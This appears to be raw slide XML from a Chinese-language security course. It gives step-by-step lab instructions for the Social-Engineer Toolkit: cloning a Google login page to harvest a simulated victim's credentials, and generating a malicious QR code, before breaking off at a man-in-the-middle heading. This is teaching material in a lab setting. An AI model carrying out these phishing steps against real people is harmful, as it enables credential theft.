                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：继续选择菜单第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>项：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Credential Harvester Attack Method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（凭证收集攻击方法）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：继续选择菜单第一项：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web Templates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（网站模板）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>： 设置凭证收集器（攻击机）的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: 192.168.77.128</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：继续选择菜单第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>项：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>网站模板。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>8:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>模拟受害机登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>网站，输入用户名和密码并尝试登录，观察到攻击机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>界面成功监听</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>到受害机的用户名和密码信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEDF10A0-D5C9-2DA9-6F31-C6DA48A649A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8265459" y="3622785"/>
            <a:ext cx="3639670" cy="3144383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32655137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bwMode="auto">
          <a:xfrm>
            <a:off x="468923" y="1783617"/>
            <a:ext cx="10515600" cy="392552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a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>二维码攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>：启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>：选择菜单第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>项：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Social-Engineering Attacks:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>社会工程学攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>3:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>继续选择菜单第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>QRCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Generator Attack Vector (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>二维码生成器攻击向量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>：设置二维码对应网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，设置完成后会在攻击机本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/root/.set/reports/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>路径下生成一张二维码图片</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>qrcode_attack.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>：查看二维码，可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xdg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>命令打开图片</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>：手机扫描二维码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>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7631439" y="4032738"/>
            <a:ext cx="3353084" cy="2708749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27293953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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2227263"/>
            <a:ext cx="6764338" cy="2289175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>中间人攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
